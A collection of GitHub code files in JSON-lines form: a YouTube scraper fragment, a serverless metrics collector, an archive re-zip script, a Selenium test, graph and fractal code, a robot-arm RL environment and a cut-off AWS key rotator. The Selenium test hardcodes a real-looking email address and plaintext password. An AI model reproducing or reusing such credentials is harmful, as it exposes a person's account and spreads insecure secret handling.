{DISLIKES}\")\r\n\t\tprint(f\"Description: {DESCRIPTION}\")\r\n\t\tprint(f\"Published on: {PUBLISH_DATE}\")\r\n\t\tprint(f\"Youtube category: {YOUTUBE_CATEGORY}\")\r\n\t\tprint(len(dataset))\r\n\t\tprint(\"--------------------------------------------------------\")\r\n\r\n\t\t\r\ndef threader():\r\n\twhile True:\r\n\t\turl = q.get()\r\n\t\tmyJob(url)\r\n\t\tq.task_done()\r\n\r\nfor x in range(10): \r\n\tt = threading.Thread(target = threader)\r\n\tt.daemon = True\r\n\tt.start()\r\n\r\nfor url in urls:\r\n\tq.put(url)\r\n\r\nq.join()\r\nprint(len(dataset))\r\ndata = pd.DataFrame(dataset)\r\ndata.to_csv(f'{SEARCH_QUERY}_dataset.csv')","repo_name":"Anko1418/Youtube_Scraping_by_keywords_in_python","sub_path":"WebScrapper.py","file_name":"WebScrapper.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42333430212","text":"# 用于从Prometheus中获取函数的调用日志\n'''\n获取所有metrics的名称: curl http://127.0.0.1:9090/api/v1/label/__name__/values\n\n'''\nimport csv\n\nimport requests\nfrom urllib.parse import urljoin\nimport json\n\n\nclass Prometheus_collector:\n def __init__(self, prometheus_ip=\"127.0.0.1\", port=9090) -> None:\n self.base_url = f\"http://{prometheus_ip}:{port}\"\n pass\n\n # 获取Prometheus的所有metrics name\n def get_all_metric_name_list(self):\n req_url = urljoin(self.base_url, \"api/v1/label/__name__/values\")\n response = requests.get(\n url=req_url\n )\n res_dict = json.loads(response.content)\n if res_dict[\"status\"] == \"success\":\n return res_dict[\"data\"]\n else:\n return []\n\n # 获取指定metric name的历史数据\n def get_by_metric_name(self, metric_name):\n pass\n\n\n# 从自己做的function runtime中获取metrics\nclass Runtime_collector:\n def __init__(self) -> None:\n pass\n\n def load_data_dict_list(self, csv_path=None):\n # 从csv文件中加载result_dict_list\n # 读取csv文件\n data_dict_list = []\n with open(csv_path, 'r', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n input_obj = row.get(\"input_obj\")\n log_dict = row.get(\"log_dict\")\n result_dict = row.get(\"result_dict\")\n resource_dict = row.get(\"resource_dict\")\n\n # json不规范需要replace修正\n input_obj = json.loads(input_obj.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n log_dict = json.loads(log_dict.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n result_dict = json.loads(\n result_dict.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n resource_dict = json.loads(\n resource_dict.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n\n res_dict = {\n \"input_obj\": input_obj,\n \"log_dict\": log_dict,\n \"result_dict\": result_dict,\n \"resource_dict\": resource_dict\n }\n data_dict_list.append(res_dict)\n return data_dict_list\n\n def data_dict_list_filter(self, node_name_list=None, cpu_list=None, cold_start=None, data_dict_list=None) -> list:\n # 对data_dict_list进行过滤\n filtered_data_dict_list = []\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n resource_dict = data_dict.get(\"resource_dict\")\n # 分别针对指标进行筛选\n if node_name_list is not None:\n node_name = resource_dict.get(\"node_name\")\n if node_name not in node_name_list:\n continue\n if cpu_list is not None:\n cpu = resource_dict.get(\"cpu\")\n if cpu not in cpu_list:\n continue\n if cold_start is not None:\n cold_start_flag = log_dict.get(\"COLD_START_FLAG\")\n if cold_start_flag != cold_start:\n continue\n filtered_data_dict_list.append(data_dict)\n return filtered_data_dict_list\n\n def get_mapping_delay_time_series(self, data_dict_list):\n # 从result_dict_list中获取mapping_delay的时间序列\n mapping_delay_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n\n mapping_delay = log_dict.get(\"mapping_delay\")\n invoke_t = input_obj.get(\"invoke_t\")\n mapping_delay_tuple_list.append((invoke_t, mapping_delay)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 对mapping_delay_tuple_list进行排序\n # print(f\"mapping_delay_tuple_list:{mapping_delay_tuple_list}\")\n mapping_delay_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n mapping_delay_list = [x[1] for x in mapping_delay_tuple_list]\n return mapping_delay_list\n\n def get_request_count_time_series(self, data_dict_list):\n # 从result_dict_list中获取函数请求量的时间序列\n\n pass\n\n def get_latency_time_series(self, data_dict_list):\n # 从result_dict_list中获取函数延迟的时间序列\n latency_time_list = []\n latency_time_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n\n finish_t = log_dict.get(\"finish_t\")\n invoke_t = input_obj.get(\"invoke_t\")\n latency_t = finish_t - invoke_t\n latency_time_tuple_list.append((invoke_t, latency_t)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 对mapping_delay_tuple_list进行排序\n # print(f\"mapping_delay_tuple_list:{mapping_delay_tuple_list}\")\n latency_time_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n latency_time_list = [x[1] for x in latency_time_tuple_list]\n return latency_time_list\n\n def get_compute_time_series(self, data_dict_list):\n # 从data_dict_list中获取函数计算时间的时间序列\n compute_time_list = []\n compute_time_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n\n invoke_t = input_obj.get(\"invoke_t\")\n compute_t = log_dict.get(\"compute_t\")\n\n compute_time_tuple_list.append((invoke_t, compute_t)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 对mapping_delay_tuple_list进行排序\n # print(f\"mapping_delay_tuple_list:{mapping_delay_tuple_list}\")\n compute_time_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n compute_time_list = [x[1] for x in compute_time_tuple_list]\n return compute_time_list\n\n def get_cold_start_time_series(self, data_dict_list):\n # 从data_dict_list中获取函数冷启动的时间序列\n pass\n\n def get_scheduled_location_list(self, data_dict_list):\n # 从data_dict_list中获取函数被调度的位置的列表\n # 位置用 pod_name 和 node_name来描述\n scheduled_location_list = []\n scheduled_location_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n resource_dict = data_dict.get(\"resource_dict\")\n\n invoke_t = input_obj.get(\"invoke_t\")\n\n pod_name = resource_dict.get(\"hostname\")\n node_name = resource_dict.get(\"nodename\")\n\n location = {\n \"pod_name\": pod_name,\n \"node_name\": node_name,\n }\n\n scheduled_location_tuple_list.append((invoke_t, location)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 进行排序\n scheduled_location_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n scheduled_location_list = [x[1] for x in scheduled_location_tuple_list]\n return scheduled_location_list\n pass\n\n\nclass Test_Runtime_collector:\n def __init__(self):\n pass\n\n def test_load_result_dict_list(self):\n my_runtime_collector = Runtime_collector()\n res = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n print(f\"load_result_dict_list:{res}\")\n\n def test_get_concurrency_time_series(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_mapping_delay_time_series(data_dict_list=data_dict_list[0:20])\n print(f\"get_mapping_delay_time_series:{res}\")\n\n def test_get_latency_time_series(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_latency_time_series(data_dict_list=data_dict_list[0:20])\n print(f\"get_latency_time_series:{res}\")\n\n def test_get_compute_time_series(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_compute_time_series(data_dict_list=data_dict_list[0:20])\n print(f\"get_compute_time_series:{res}\")\n\n def test_get_scheduled_location_list(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_scheduled_location_list(data_dict_list=data_dict_list[0:20])\n print(f\"get_scheduled_location_list:{res}\")\n\n def test_data_dict_list_filter(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.data_dict_list_filter(\n node_name_list=[\"k8s01\",\"k8s02\",\"k8s03\",\"k8s04\",\"k8s05\",\"k8s06\",\"k8s07\",\"k8s08\"],\n cpu_list=[2],\n cold_start=True,\n data_dict_list=data_dict_list\n )\n print(f\"data_dict_list_filter:{res}\")\n\n\n\nif __name__ == \"__main__\":\n my_test = Test_Runtime_collector()\n my_test.test_load_result_dict_list()\n\n # my_test.test_get_concurrency_time_series()\n # my_test.test_get_latency_time_series()\n # my_test.test_get_compute_time_series()\n my_test.test_data_dict_list_filter()\n # my_test.test_get_scheduled_location_list()\n","repo_name":"wenzhaojie/faas-invoker","sub_path":"faas_invoker/metrics_collector.py","file_name":"metrics_collector.py","file_ext":"py","file_size_in_byte":11119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24197673340","text":"from os import path, listdir, rename, remove, chdir\nfrom shutil import rmtree\nimport subprocess\nfrom sys import stderr\n\n\ndef run_cmd(cmd):\n print(cmd)\n complete_process = subprocess.run(cmd.split(' '))\n if complete_process.returncode != 0:\n print(\"Error: sbatch command finished on non 0 return value\", file=stderr)\n print(\"error code\", complete_process.returncode, file=stderr)\n return False\n return True\n\n\nsample_path = path.join(\"data\", \"CFDL_split\", \"res_10129\")\nmols_path = path.join(sample_path, \"molecules_10129\")\n\nfiles_per_mol = {}\n\n# Register all missing files per molecule\nfor file in listdir(mols_path):\n if file.endswith(\".fa\"):\n mol = file[:file.find(\"_\")]\n if mol not in files_per_mol:\n files_per_mol[mol] = []\n files_per_mol[mol].append(file)\n\n# Move to the mol directory to decompress/recompress\nchdir(mols_path)\nfor mol in files_per_mol:\n # decompress the molecule\n mol_dir = f\"10129_{mol}\"\n archive = f\"10129_{mol}.tar.gz\"\n ok = run_cmd(f\"tar -xzf {archive}\")\n if ok:\n remove(archive)\n else:\n print(\"Problem on molecule\", mol, file=stderr)\n exit(1)\n\n # add the files\n for file in files_per_mol[mol]:\n rename(file, path.join(mol_dir, file[file.rfind('/')+1:]))\n\n # recompress the molecule\n ok = run_cmd(f\"tar -czf {archive} {mol_dir}\")\n if ok:\n rmtree(mol_dir)\n else:\n print(\"Recompression failed for\", mol_dir)\n exit(1)\n","repo_name":"yoann-dufresne/jeanzay_colabfold","sub_path":"scripts/debug/rezip.py","file_name":"rezip.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41278939451","text":"import unittest\nfrom selenium import webdriver\nfrom pages.login.LoginPage import LoginPage\nfrom pages.dashboard.DashboardPage import DashboardPage\nfrom pages.usecases.UseCasesPage import UseCasesPage\nfrom pages.usecase.UseCasePage import UseCasePage\nfrom tests.tests_data.UseCaseMockData import UseCaseDataMock\nfrom selenium.webdriver.support import expected_conditions as ExpectedConditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\n\n\nclass CreateUseCasesTest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.get(\"https://qa-sandbox.apps.htec.rs/dashboard\")\n loginFromContainer = self.driver.find_element_by_class_name('btn-secondary')\n loginFromContainer.click()\n WebDriverWait(self.driver, 10).until(\n ExpectedConditions.visibility_of_element_located((By.CSS_SELECTOR, \"button[data-testid='submit_btn']\"))\n )\n loginPage = LoginPage(self.driver)\n loginPage.enter_login_credentials(\"stancicmilan06@gmail.com\", \"lINKINpARK06\")\n loginPage.submitButton.click()\n\n def testCreateUseCases(self):\n WebDriverWait(self.driver, 10).until(\n ExpectedConditions.visibility_of_element_located((By.CSS_SELECTOR, \"div[data-testid='use_cases_card_id']\"))\n )\n dashboard_page = DashboardPage(self.driver)\n dashboard_page.use_cases_card.click()\n\n mock_data = UseCaseDataMock()\n\n for test_case_index in range(len(mock_data.all_use_cases)):\n #ovo ili je nepotrebno ili trerba izmeniti da gadja stranicu\n WebDriverWait(self.driver, 10).until(\n ExpectedConditions.visibility_of_element_located(\n (By.CSS_SELECTOR, \"a[data-testid='create_use_case_btn']\"))\n )\n use_cases_page = UseCasesPage(self.driver)\n use_cases_page.create_use_case_btn.click()\n\n data = mock_data.all_use_cases[test_case_index]\n\n self.create_new_use_case(data)\n\n use_cases_page = UseCasesPage(self.driver)\n saved_use_case = use_cases_page.get_first_use_case()\n\n self.assertEqual(data.title, saved_use_case.get_title())\n self.assertEqual(data.description, saved_use_case.get_description())\n self.assertEqual(data.expected_result, saved_use_case.get_expected_result())\n self.assertEqual(len(data.steps), saved_use_case.get_num_of_steps())\n\n for step_index in range(len(data.steps)):\n self.assertEqual(data.steps[step_index], saved_use_case.get_step_value(step_index))\n\n saved_use_case.return_to_dashboard_btn.click()\n\n def create_new_use_case(self, mock_data):\n\n new_use_case = UseCasePage(self.driver)\n new_use_case.set_title(mock_data.title)\n new_use_case.set_description(mock_data.description)\n new_use_case.set_expected_result(mock_data.expected_result)\n new_use_case.set_steps(mock_data.steps)\n new_use_case.submit_btn.click()\n\n def tearDown(self):\n # close the browser window\n self.driver.quit()","repo_name":"Zovido/webdriver-test","sub_path":"tests/test_cases/CreateUseCasesTest.py","file_name":"CreateUseCasesTest.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4416365672","text":"# coding: utf-8\n\"\"\"\nGraph\nhttps://en.wikipedia.org/wiki/Graph_(abstract_data_type)\nhttps://en.wikipedia.org/wiki/Adjacency_list\n\"\"\"\nfrom collections import defaultdict\n\nfrom data_structures.graphs.adjacency_map_directed_weighted_graph import DirectedGraph\n\n\nclass UndirectedGraph(DirectedGraph):\n def __init__(self):\n super().__init__()\n\n # {\n # 'source_vertex': {\n # 'destination_vertex': 'edge_weight',\n # },\n # 'destination_vertex': {\n # 'source_vertex': 'edge_weight',\n # }\n # }\n # NOTE: outgoing_edges of an undirected graph contains both (u, v) and (v, u) for each edge.\n self.outgoing_edges = defaultdict(dict)\n\n def add_edge(self, u, v, weight=None):\n # Actually, we can treat a directed graph as a undirected graph.\n # As long as we add both endpoints for the same edge, for instance, `add_edge(u, v, 1)` and `add_edge(v, u, 1)`.\n self.outgoing_edges[u][v] = weight\n self.outgoing_edges[v][u] = weight\n\n def remove_edge(self, u, v):\n try:\n del self.outgoing_edges[u][v]\n del self.outgoing_edges[v][u]\n except KeyError:\n raise ValueError(f'No such edge: {(u, v)} or {(v, u)}')\n\n def edge_count(self):\n count = 0\n for _ in self.edges():\n count += 1\n return count\n\n def edges(self):\n deduplicate_edges = set()\n for source, incident_edges in self.outgoing_edges.items():\n for destination, weight in incident_edges.items():\n # Make sure that (u, v) and (v, u) wouldn't both exist in the results.\n pair = sorted([source, destination])\n deduplicate_edges.add((pair[0], pair[1], weight))\n\n return deduplicate_edges\n\n def incident_edges(self, v, edge_type='outgoing'):\n for destination, weight in self.outgoing_edges[v].items():\n pair = sorted([v, destination])\n yield (pair[0], pair[1], weight)\n","repo_name":"vinta/fuck-coding-interviews","sub_path":"data_structures/graphs/adjacency_map_undirected_weighted_graph.py","file_name":"adjacency_map_undirected_weighted_graph.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"66"} +{"seq_id":"72967378131","text":"import Mandelbrot\nfrom RGB import RGB\nfrom ZoomList import ZoomList\nfrom Zoom import Zoom\nfrom Mandelbrot import Mandelbrot\n\n\nclass FractalCreator(object):\n\n def __init__(self, width, height, num_of_iterations):\n self.width = width\n self.height = height\n self.fractal = [[0 for y in range(self.height)] for x in range(self.width)]\n self.histogram = [0] * num_of_iterations\n self.ranges = []\n self.range_totals = []\n self.colors = []\n self.zoomlist = ZoomList(width=width, height=height)\n self.got_starting_range = False\n self.max_iterations = num_of_iterations\n self.mandelbrot = Mandelbrot(num_of_iterations)\n\n def run(self):\n self.calculate_iterations()\n self.calculate_ranges()\n self.draw_fractal()\n\n def add_zoom(self, x, y, scale):\n self.zoomlist.add(Zoom(x, self.height - y, scale))\n\n def add_scroll(self, x, y):\n self.zoomlist.scroll(x, y)\n\n def add_range(self, range_end, r, g, b):\n self.ranges.append(range_end * self.max_iterations)\n self.colors.append(RGB(r, g, b))\n\n if self.got_starting_range:\n self.range_totals.append(0)\n else:\n self.got_starting_range = True\n\n def get_range(self, iteration):\n range_i = 0\n\n for i in range(1, len(self.ranges)):\n range_i = 1\n if self.ranges[i] > iteration:\n break\n\n range_i = range_i - 1\n return range_i\n\n def calculate_iterations(self):\n print(\"Calculating iterations\")\n # Calculating the iterations\n for y in range(self.height):\n for x in range(self.width):\n\n coords = self.zoomlist.do_zoom(x=x, y=y)\n iterations = self.mandelbrot.getIterations(coords[0], coords[1])\n\n self.fractal[x][y] = iterations\n\n if iterations != self.max_iterations:\n self.histogram[iterations] += 1\n\n def calculate_ranges(self):\n print(\"Calculating ranges\")\n # Calculating the ranges\n rangeindex = 0\n for i in range(self.max_iterations):\n pixels = self.histogram[i]\n\n if i >= self.ranges[rangeindex + 1]:\n rangeindex += 1\n\n self.range_totals[rangeindex] += + pixels\n\n def draw_fractal(self):\n print(\"Drawing fractal\")\n # Create the file writer\n filename = \"example.ppm\"\n with open(filename, \"w\") as output_file:\n print(\"P3\", file=output_file)\n print(str(self.width) + \" \" + str(self.height), file=output_file)\n print(255, file=output_file)\n\n # Draw the fractal\n total = 0\n for i in range(self.max_iterations):\n total = total + self.histogram[i]\n\n for y in range(self.height):\n for x in range(self.width):\n iteration = self.fractal[x][y]\n iteration_range = self.get_range(iteration)\n range_total = self.range_totals[iteration_range]\n range_start = self.ranges[iteration_range]\n\n start_color = self.colors[iteration_range]\n end_color = self.colors[iteration_range + 1]\n diff_color = end_color - start_color\n red = 0\n green = 0\n blue = 0\n\n if iteration != self.max_iterations:\n\n total_pixels = 0\n for i in range(range_start, iteration):\n total_pixels += self.histogram[i]\n\n red = int(start_color.r + pow(diff_color.r, total_pixels/range_total))\n blue = int(start_color.b + pow(diff_color.b, total_pixels/range_total))\n green = int(start_color.g + pow(diff_color.g, total_pixels/range_total))\n\n print(\"Writing pixel \" + str(x) + \", \" + str(y))\n # Write to file here\n print(str(red) + \" \" + str(green) + \" \" + str(blue) + \" \", file=output_file)\n","repo_name":"ksfoster66/FractalDisplay","sub_path":"FractalCreator.py","file_name":"FractalCreator.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40034981087","text":"\"\"\"\nyaooooo\nthis is robot env code\nupdate time:12/11\n\n將距離和角度正規化並修改reward和結束條件\n\nstate dim=5\n0~3:joint pos\n# 4~6:cuboid pos\n# 7~9:EEF pos\n4:dis\n-------------------\naction dim=4\njoint pos\n--------------------\njoint_bound\njoint 1=[-170 170]\njoint 2=[-135 80]\njoint 3=[-70 104]\njoint 4=[-190 190]\njoint 5=[-115 115]\njoint 6=[-360 360]\n\n\"\"\"\n\nimport numpy as np\nimport math\nimport time\nimport inverseKinematics as IK\nimport Kinematics as FK\nfrom IK_FindOptSol import FindOptSol\nfrom simulation_robot import simulation_robot as id_robot\nfrom robot_vrep import my_robot\n\nradtodeg = 180 / math.pi # 弧度轉角度\ndegtorad = math.pi / 180 # 角度轉弧度\n#這裡單位是 cm 吸嘴加0.068m\nDH_table = np.array([[0, 0.345, 0.08, math.pi / 2],\n\t\t\t\t\t [0+math.pi / 2 , 0, 0.27, 0],\n\t\t\t\t\t [0, 0, 0.09, math.pi / 2],\n\t\t\t\t\t [0, 0.295, 0, -math.pi / 2],\n\t\t\t\t\t [0, 0, 0, math.pi / 2],\n\t\t\t\t\t [0, 0.102+0.068, 0, 0]])\n\n\ndef save_txt(data, fmt='%f'):\n f = open('C:/Users/user/Desktop/rl/data.txt', 'a')\n np.savetxt(f, data, fmt=fmt)\n f.close()\n\nclass robot_env(object):\n # joint_bound\n degtorad = math.pi / 180\n joint1_bound = [-50 * degtorad, 50 * degtorad]#(-0.87~0.87)\n joint2_bound = [-80 * degtorad, 70 * degtorad]#(-1.430~1.22)\n joint3_bound = [-60 * degtorad, 60 * degtorad]#(-1.22~1.04)\n joint4_bound = [0 * degtorad, 0 * degtorad]\n joint5_bound = [-90 * degtorad, 3 * degtorad]#(-1.57~0)\n joint6_bound = [-360 * degtorad, 360 * degtorad]\n state_dim = 7\n action_dim = 3\n\n def __init__(self):\n self.radtodeg = 180 / math.pi # 弧度轉角度\n self.degtorad = math.pi / 180 # 角度轉弧度\n self.my_robot = my_robot()\n self.my_robot.connection()\n\n def initial(self):\n self.my_robot.stop_sim()\n self.my_robot.start_sim()\n\n def reset(self):\n # return state containing joint ,EFF ,target ,dis\n # robot to initial pos and random the target\n\n #self.my_robot.stop_sim()\n #self.my_robot.start_sim()\n self.my_robot.move_all_joint([0,0,0,0,0,0])\n print('reset')\n\n #self.my_robot.start_sim()\n self.my_robot.random_object()\n return self.get_state()\n\n def get_state(self):\n # state:{物體位置,末端點位置}\n # self.joint_pos = self.my_robot.get_joint_pos() # dim=6\n # self.joint_pos=np.round(self.joint_pos,5)\n # Info, EulerAngle_vrep, self.EulerAngle, Position = FK.ForwardKinemetics(self.joint_pos , DH_table)\n # Position=np.round(Position,4)\n EEF_pos = self.my_robot.get_EEF_pos() # dim=3\n EEF_pos = np.round(EEF_pos , 4)\n\n cubid_pos = self.my_robot.get_cuboid_pos() # dim=3\n\n\n diffence = [(cubid_pos[0] - EEF_pos[0]), (cubid_pos[1] - EEF_pos[1]), (cubid_pos[2] - EEF_pos[2])]\n self.distance = np.sqrt(pow(diffence[0], 2) + pow(diffence[1], 2) + pow(diffence[2], 2))\n\n s = np.hstack((EEF_pos, cubid_pos, self.distance ))\n # print('s',s)\n # 吸嘴狀態還沒加上去\n return s\n\n\n def step(self, action):\n done = False\n outbound=False\n reward = 0\n optimalsol_set=[]\n # print('action',action)\n # EEF_pos = self.my_robot.get_EEF_pos() # dim=3\n joint_pos = self.my_robot.get_joint_pos() # dim=6\n\n time.sleep(0.2)\n joint_pos[0] = joint_pos[0] + action[0]\n joint_pos[1] = joint_pos[1] + action[1]\n joint_pos[2] = joint_pos[2] + action[2]\n\n\n outbound = self.check_bound(joint_pos,outbound)\n\n\n if not outbound:\n self.my_robot.move_all_joint(joint_pos)\n else:\n\n reward-=1\n\n # suction_flag=False#是否吸取物體\n EEF_pos = self.my_robot.get_EEF_pos() # dim=3\n cubid_pos = self.my_robot.get_cuboid_pos()\n diffence = [(cubid_pos[0] - EEF_pos[0]), (cubid_pos[1] - EEF_pos[1]), (cubid_pos[2] - EEF_pos[2])]\n distance = np.sqrt(pow(diffence[0], 2) + pow(diffence[1], 2) + pow(diffence[2], 2))\n # print('dis',distance)\n\n # joint_pos = self.my_robot.get_joint_pos()\n # # print('joint_pos',joint_pos)\n # joint_state = np.hstack((joint_pos[0], joint_pos[1], joint_pos[2], joint_pos[4])) # dim4\n\n # if self.distance0.1:\n reward += 1\n done = True\n else:\n reward -=1\n done=False\n self.my_robot.enable_suction(False)\n\n s_ = self.get_state()\n # print('re',reward)\n return s_, reward, done\n\n def reward_fun(self,d_t1,d_t2):\n r1=-d_t2\n if (d_t2<0.01):\n r2=5\n elif(0.01=0.7):\n r2=-2\n\n\n r3=-math.exp(1.2+d_t2)\n\n if(d_t2=d_t1):\n r4=0\n R1=4*r1+r2\n R2=r2+r3+r4\n # print('r1',r1,'r2',r2,'r3',r3,'r4',r4,'R1','R2',R2)\n return R1 ,R2\n\n def check_bound(self,joint_pos,outbound):\n pos_lim=np.array([[-170*degtorad*0.85,170*degtorad*0.85],\n [-85*degtorad*0.85,130*degtorad*0.85],\n [-170*degtorad*0.85,110*degtorad*0.85],\n [-190*degtorad*0.85,190*degtorad*0.85],\n [-125*degtorad*0.85,125*degtorad*0.85],\n [-360*degtorad*0.85,360*degtorad*0.85]])\n # print('lim',pos_lim[2])\n for i in range(6):\n if pos_lim[i][0]>joint_pos[i] or joint_pos[i]>pos_lim[i][1]:\n outbound=True\n return outbound\n\n\n def sample_action(self):\n return np.random.rand(4) # 4 joints\n\n def render(self):\n\n pass\n\n\nif __name__ == '__main__':\n env = robot_env()\n env.reset()\n # time.sleep(10)\n # while True:\n time.sleep(5)\n action = np.array([0, 0, 0, -0.5], dtype=np.float32)\n env.my_robot.move_4_joint(action)\n # env.step(env.sample_action())\n print(action *env.radtodeg)\n time.sleep(10)\n","repo_name":"ad45675/rl","sub_path":"vrep/DDPG_version/env_new.py","file_name":"env_new.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32267369439","text":"import os\nimport time\nimport gc\nstart_time = time.time()\n\nif __name__ == '__main__':\n for i in range(1,60):\n cmd = 'python3 MusicAnalyse_TimeStep.py %d ' % (i)\n os.system(cmd)\n print('In length %d Final Time cost:' % i, time.time() - start_time)\n gc.collect()\n","repo_name":"naykun/MusicResearch","sub_path":"Dataset_Covertor/MusicPreprocessing/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"69842402450","text":"import logging\nfrom time import sleep\nfrom configparser import ConfigParser\nfrom contextlib import contextmanager\nfrom collections import namedtuple\n\nimport boto3\nimport coloredlogs\nfrom botocore.exceptions import ClientError\n\nfrom . import constants\n\nAccessKey = namedtuple(\"AccessKey\", \"id,status\")\n\n\nclass MaximumRetriesExceeded(Exception):\n pass\n\n\ndef retry(attempts, sleep_time):\n \"\"\"\n Retry decorator.\n\n Args:\n attempts (int): Number of attempts before throwing MaximumRetriesExceeded\n sleep_time (int): Time to sleep between attempts.\n Raises:\n MaximumRetriesExceeded\n \"\"\"\n\n def inner(fn):\n def _inner(*args, **kwargs):\n for _ in range(attempts):\n try:\n return fn(*args, **kwargs)\n except ClientError as error:\n if error.response[\"Error\"][\"Code\"] == \"InvalidClientTokenId\":\n sleep(sleep_time)\n else:\n raise error\n raise MaximumRetriesExceeded\n\n return _inner\n\n return inner\n\n\nclass IAMKeyRotator:\n def __init__(self, config):\n \"\"\"\n Initialization.\n\n Args:\n config (argparse.Namespace): Config values taken directly from the\n ArgumentParser in cli.py.\n \"\"\"\n self.config = config\n self.log = logging.getLogger(__name__)\n log_level = \"DEBUG\" if config.verbose else \"INFO\"\n coloredlogs.install(level=log_level, logger=self.log)\n\n @contextmanager\n def _credentials(self):\n \"\"\"\n Wrapper around parsing the credentials file, then writing it back if any\n changes are made.\n\n Use this as a context manager - e.g.:\n\n with self._credentials() as parser:\n do_stuff(parser)\n\n Yields:\n ConfigParser: ConfigParser object around the AWS credentials file.\n \"\"\"\n parser = ConfigParser()\n with open(self.config.credentials, \"r\") as fp:\n self.log.debug(\"Reading credentials file %s\", self.config.credentials)\n parser.read_string(fp.read())\n yield parser\n with open(self.config.credentials, \"w\") as fp:\n self.log.debug(\"Writing to credentials file %s\", self.config.credentials)\n parser.write(fp)\n\n @staticmethod\n def _contains_keypair(section):\n \"\"\"\n Determine if this section of the credentials file contains an aws_access_key_id\n and aws_secret_access_key.\n\n Args:\n section (configparser.SectionProxy): The section of the credentials file.\n\n Returns:\n bool: Whether this section contains aws_access_key_id and aws_secret_access_key.\n \"\"\"\n try:\n section[constants.AWS_ACCESS_KEY_ID]\n section[constants.AWS_SECRET_ACCESS_KEY]\n return True\n except KeyError:\n return False\n\n def _get_rotatable_profiles(self):\n \"\"\"\n Parses the credentials file and returns a list of all profiles that contain\n both an aws_access_key_id and aws_secret_access_key.\n\n Returns:\n List[str]: List of available profiles that contain access key IDs.\n \"\"\"\n with self._credentials() as parser:\n profiles = [\n section\n for section in parser.sections()\n if self._contains_keypair(parser[section])\n ]\n self.log.debug(\"Found profiles: %s\", profiles)\n return profiles\n\n def _get_boto_session(self, profile_name):\n \"\"\"\n Instantiates a boto session.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n\n Returns:\n boto3.Session\n \"\"\"\n self.log.debug(\"Instantiating boto session with profile %s\", profile_name)\n return 